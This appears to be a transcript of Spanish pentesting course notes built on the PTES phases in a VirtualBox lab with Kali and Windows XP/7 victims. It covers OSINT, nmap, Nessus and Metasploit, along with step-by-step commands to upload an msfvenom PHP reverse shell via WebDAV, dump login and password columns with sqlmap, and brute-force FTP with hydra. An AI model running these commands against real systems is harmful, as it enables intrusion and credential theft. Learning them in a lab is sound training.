PTES

download PTES

If you can't read please download the document

description

Inicio para pentesting

Transcript of PTES

UT 1CLASE IPASOS PARA UN PENTESTINGPREACUERDO: AUERDO DE LAS PARTES, SE FIJAN LAS NECESIDADES DEL CLIENTE Y LOS HONORARIOS DEL PROFESIONAL DE SEGURIDAD.RECOLECCION DE INFORMACION:RECOLECTAR INFO DE FUENTES ABIERTAS INTELIGENTES, EJM FACEBOOK, ISTAGRAM, ETC.MODELADO AMENAZAS: PLANIFICAR ATAQUES, POR DONDE IR, DONDE ATACARANALISIS DE VULNERABILIDADES:ASEGURAR QUE EL EXPLOIT FUNCIONE SABIENDO CUAL ES LA VULNERABILIDADEXPLOTACION: SACAR PROVECHO DE LAS VULNERABILIDADES DEL SISTEMAPOST-EXPLOTACION:UNA VEZ EN EL SISTEMA, SE PUEDE ESCALAR, IR A OTROS LUGARES DE LA RED, SACAR CONTRASEAS DE OTROS LUGARES.REPORTE: IMPORTANTISIMO PARA EL CLIENTE, DOCUMENTAR LOS RESULTADOS, CON INFORME EJECUTIVO PARA CEO, GERENCIA, ETC.DAR UN INFORME CON PERFIL DE RIESGO, Y UN REPORTE TCNICO PARA EL ADMINISTRADOR DE SISTEMAS.==============================================================================CLASE II: LABORATORIO DE PENTESTING* VIRTUAL BOX- WINDOWS XP (VICTIMA)- WINDOWS 7 (VICTIMA)- KALI LINUX (ATACANTE)* CONEXION A INTERNET* CEREBROKALI Y TODAS LAS MQUINAS SE DEBEN CONFIGURAR CON ADAPTADOR PUENTE (PARA QUE QUEDEN EN LA MISMA RED DE LAS VCTIMAS).INSTALAR WEB FOR PENTESTERS (DESCARGAR ISO).===============================================================================UT IICLASE IMETODOLOGIA OSINT.ESTA DENTRO DE LA FASE DE RECOLECCION DE INFO, DESDE FUENTES ABEIRTAS INTELIGENTES.SE USA UNA HERRAMIENTA WEB LLAMADA NETCRAFT, EN ESTA SE INGRESA EL DOMINIO DE LA EMPRESA.COMANDO EN LINUX "WHOIS": SE TECLEA EN LA CONSOLA DE KALI, LA SINTAXIS ES "whois nombre.de.dominio.ext" EJM: whois unab.edu.coPROPORCIONA INFORMACION IMPORTANTE DE LOS REGISTROS DEL DOMINIO.THEHARVESTER: ESTA EN KALI, SE DEBE TECLEAR EL COMANDO MAS EL DOMINIO QUE SE DESEA BUSCAR, LA SINTAXIS ES "theharvester -d unab.edu.com -l 500 -b google", donde "-d" es el dominio, -l "lenght" o cantidad de resultados de busqueday "-b" el motor de busqueda que se utilizara (google,yahoo,etc).EL RESULTADO NOS MUESTRA UNA IP PBLICA, DOMINIO Y CORREO.(SUBDOMINIOS Y HOSTS).================================================================================CLASE IIOSINT RECOLECCION DE INFORMACION DE MALTEGOIMPORTANTE HERRAMIENTA PARA BUSQUEDA DE INFORMACION.SE DEBE LOGEAR, INCRIBIR Y ACCEDER AL SOFTWARE.COMPANY STALKER SIRVE PARA BUSCAR EMAILS DEL DOMINIO QUE ESTAMOS BUCANDO.TIENE EN INTERFAZ GRAFICA.TRANSFORMACIONES:SIRVE PARA LIGAR APLICACIONES AL DOMINIO QUE SE ESTA INVESTIGANDO.MALTEGO MANTIENE SUS TRANSFORMACIONES SEGUN LO QUE ESTEMOS AUDITANDO.RECOLECTA INFORMACION DE FUENTES PUBLICAS.ESTA INFO ES MUY PROBABLE QUE NOS SIRVA PARA LA FASE DE EXPLOTACIN.=================================================================================CLASE IIIESCANEO DE PUERTOS CON NMAPCOMANDOS DE NMAP:* -sS (SONDEO TCP SYN): NO COMPLETA LAS CONEXIONES, SUELE SER EL MAS SIGILOSO. (INICIA SESIONES Y NO LAS CIERRA).NEGOCIACION DE TRES PASOS* SINTAXIS "nmap -sS 192.168.0.1 (ip objetivo o puerta enlace)"el resultado muestra los puertos abiertos.* SINTAXIS PARA BUSQUEDA DETALLADA "nmap -sS -Sv 192.168.1.1 (ip objetivo)"el resultado muestra informacion detallada de los puertos en uso del host* -sT (SONDEO TCP CONNECT()): SIRVE CUANDO NO TENEMOS PROVILEGIOS PARA -sS* SINTAXIS "nmap -sT 192.168.1.1 (ip objetivo)"el resultado arroja lo mismo que en -sS* -sU (SONDEO UDP): ENVIO SIN DATOS DE UNA CABECERA UDP PARA CADA PUERTO.* SINTAXIS "nmap -sU 192.168.1.1 (ip objetivo)"es mas lento que tcp.* -sX (SONDEO XMAS): FIJA LOS BITS FIN, PSH Y URG.PUEDE TERMINAR LAS CONEXIONES DE LOS PUERTOS ELEGIDOS.* SINTAXIS "nmap -sX 192.168.1.1 (ip objetivo)una variable puede ser "nmap -sX 192.168.1.1 -oA" y se pone un nombre despues de oA.sirve para sacar el resultado en formatos legibles.=================================================================================UT IIICLASE IDETECTAR VULNERABILIDADES DE LA VICTIMANESSUSANTES DE UTILIZAR EXPLOITS, SE BUSCAN VULNERABILIDADES,PARA ASEGURAR EL EXITO DEL EXPLOIT.SE UTILIZA UNA HERRAMIENTA LLAMADA NESSUS, ES UN SCANNER DE VULNERABILIDADES.SE DESCARGA NESSUS HOME, SE INSTALA Y SE EJECUTA VIA WEB.SE REALIZA UN VULNERABILITY TEST EN LA RED DEL CLIENTE.SCAN==>EXPLOITS==>PENTEST==>MY SCAN: SE CREA PERFIL DE SCAN CON GRAFICAS DE VULNERABILIDADES.SE SELECCIONA EL GRFICO Y SE VEN LAS DECRIPCIONES DE LAS VULNERABILIDADES.METASPLOITSE ENCUENTRA EN KALI LINUX.EL COMANDO PARA ESCANEAR EXPLOIT "use scanner/ftp/anonnymous"#set RHOSTS 192.168.1.12 (ip propia)#exploit#use auxiliary/scanner/mysql/mysql_login#show options#set RHOST 192.168.1.12ATAQUE FUERZA BRUTA (antes hay que crear un diccionario)#set PASS_FILE password#set USER_FILE#set RHOST 192.168.1.12#runNIKTOnikto -h 192.168.1.12 (muestra informacion detallada del sistema)MUESTRA LAS VULNERABILIDADES ENCONTRADAS AL SISTEMA ESCANEADO.=============================================================================CLASE IIEXPLOTACION BASICA DE VULNERABILIDADESACCESO A LA VICTIMAPRIMERO VERIFICAMOS CONEXION CON EL EQUIPO VICTIMASE EFECTUA UN ESCANEO CON NMAPSE VERIFICA LA VULNERABILIDAD ENCONTRADA EN NESSUSWINDOWS XP NO CUENTA CON SOPORTE, POR LO TANTO, LAS VULNERABILIDADES NO SERN CORREGIDAS.LAS VULNERABILIDADES MAS COMPLEJAS Y CRITICAS SON LAS REMOTAS.METASPLOIT=BUSCAR EXPLOIT PARA LA VULNERABILIDAD ENCONTRADACOMANDO "use (NOMBRE DEL EXPLOIT)" - "show options" - "set RHOST (IP VICTIMA)" - "show payloads" - "set PAYLOAD (NOMBRE DEL PAYLOAD)" - "set lhost (IP ATACANTE)" - "exploit"===============================================================================CLASE IIIEXPLOTAR Y ACCEDER A UN SERVIDOR (WEBDav)cadaver (url de la web)PEDIRA USER Y PASS, GENERALMETE POR DEFECTOput "archivo" (subir archivo a la web atacada)msfvenom -l (ver payloads disponibles)msfvenom -p "nombre del payload" /reverse_tcp -o (muestra la shell en mi pantalla)msfvenom -p "nombre del payload" /reverse_tcp LHOST="mi ip" "puerto" -f raw > "nombre del archivo.php"VOLVEMOS A CADAVERcadaver (url web)USERNAMEPASSWORDput "nombre archivo.php"CONFIGURAR UN ESCUCHADOR PARA RECIBIR LA CONEXIONENTRAR A LA CONSOLA DE METASPLOITmsfconsoleuse multihandlershow optionsset PAYLOAD "nombre del payload usado en msfvenom"set LHOST (mi ip)set LPORT (puerto configurado en msfvenom)exploit==========================================================================CLASE IVEXPLOTAR Y ACCEDER A UN SERVIDOR (SQL INJECTION)VISITAR OWASP.ORGSQLMAPsqlmap -u "url http"/cat.php?=1 --dbsn (no buscar otra base de datos)y (utilizar base de datos mysql)WAF web app firewallENTRAR A LA BASE DE DATOSsqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" --tablesVER COLUMNA DE UNA TABLAsqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (NOMBRE DE LA TABLA) --columnsVER LOGIN Y PASSsqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (NOMBRE DE LA TABLA) -C login --dumpsqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (NOMBRE DE LA TABLA) -C password --dumpCOMO SE GUARDAN CIFRADAS EN MD5, EL PROGRAMA INTENTARA DESCIFRARLA, DARLE A "y"======================================================================================UT IVATAQUES A CONTRASEASONLINEHYDRADETECTAR NOMBRES DE USUARIOS Y SUS CONTRASEAS (CREAR DICCIONARIOS)hydra -L usesrs.txt -P passwords.txt 192.168.1.70 ftp